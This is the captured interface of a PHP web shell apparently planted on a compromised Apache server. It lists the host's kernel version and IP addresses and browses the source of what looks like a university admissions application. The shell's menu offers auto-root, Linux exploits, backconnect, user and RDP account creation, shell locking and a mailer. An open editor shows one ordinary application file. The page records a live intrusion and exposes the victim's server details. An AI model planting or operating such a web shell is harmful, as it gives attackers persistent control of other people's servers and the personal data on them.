Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.14.255.58
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
adm /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormReportPOSTOFFIC...
19.27
KB
-rwxr-xr-x
applicationFormReportSBM.php
8.41
KB
-rwxr-xr-x
caccesscontext.php
1.24
KB
-rwxr-xr-x
cappcontext.php
2.66
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.76
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.35
KB
-rwxr-xr-x
dropdown.php
844
B
-rwxr-xr-x
format.php
7.43
KB
-rwxr-xr-x
fpdf_protection.php
5.61
KB
-rwxr-xr-x
getdata.php
1.06
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.2
KB
-rwxr-xr-x
kusphdadm.php
24.9
KB
-rwxr-xr-x
kusphdadm_01122018.php
17.73
KB
-rwxr-xr-x
kusphdadm_04122018.php
14.16
KB
-rwxr-xr-x
kusphdadm_07032020.php
18.3
KB
-rwxr-xr-x
kusphdadm_16092018.php
11.4
KB
-rwxr-xr-x
kusphdadm_17092018.php
11.72
KB
-rwxr-xr-x
kusphdadm_170920181.php
12
KB
-rwxr-xr-x
kusphdadm_18092018.php
15.92
KB
-rwxr-xr-x
mregistry.php
4.97
KB
-rwxr-xr-x
re_rigistration.php
7.38
KB
-rwxr-xr-x
report_bulk_applications.php
30.47
KB
-rw-rw-r--
report_bulk_applications_04122...
19.42
KB
-rwxr-xr-x
report_bulk_applications_05082...
24.53
KB
-rwxr-xr-x
report_bulk_applications_08092...
19.42
KB
-rwxr-xr-x
report_bulk_applications_12012...
26.73
KB
-rwxr-xr-x
report_bulk_applications_16092...
19.42
KB
-rwxr-xr-x
report_bulk_applications_20092...
19.42
KB
-rwxr-xr-x
report_hall_ticket.php
11.31
KB
-rwxr-xr-x
reportapplicationform - Copy.p...
19.59
KB
-rwxr-xr-x
reportapplicationform.php
23.92
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
saveApplication.php
8.91
KB
-rwxr-xr-x
saveRerigistration.php
10.87
KB
-rwxr-xr-x
student.php
15.64
KB
-rwxr-xr-x
student_04122018.php
13.67
KB
-rwxr-xr-x
subfeedetl.php
3.39
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : coutput.php
<?php require_once( APP_SRC_G . "/json.php"); function fatal_error_handler($buffer) { if (preg_match("/(error<\/b>:)(.+)(<br)/", $buffer, $regs) ) { $err = preg_replace("/<.*?>/","",$regs[2]); error_log($err); return "ERROR CAUGHT : " . $err; } return $buffer; } function handle_error ($errno, $errstr, $errfile, $errline) { error_log("$errstr in $errfile on line $errline"); if($errno == 'FATAL' || $errno == 'ERROR') { ob_end_flush(); echo "ERROR CAUGHT check log file"; exit(0); } } class CEnvelope { public $error_code = 0; public $status = ""; public $data = NULL; } class COutput { public $mobj_jsonsvc; function Initialize() { $this->mobj_jsonsvc = new Services_JSON(); ob_start("fatal_error_handler"); set_error_handler("handle_error"); } function Render() { ob_end_flush(); } function Cancel() { ob_clean(); } function Redirect($astr_url) { if(!headers_sent()) header("Location: $astr_url"); else throw new Exception("Headers have been sent Already! Can't Redirect!"); } function ToJSONEnvelope(&$aobj_data = NULL, $aint_errorcode = 0, $astr_errormsg = "") { $lstr_result = ""; $lobj_temp = new CEnvelope(); $lobj_temp->error_code = $aint_errorcode; $lobj_temp->status = $astr_errormsg; $lobj_temp->data = $aobj_data; $lstr_result = $this->mobj_jsonsvc->encode($lobj_temp); return( $lstr_result ); } function ToJSONRaw($aobj_data = NULL) { $lstr_result = $this->mobj_jsonsvc->encode($aobj_data); return( $lstr_result ); } } ?>
Close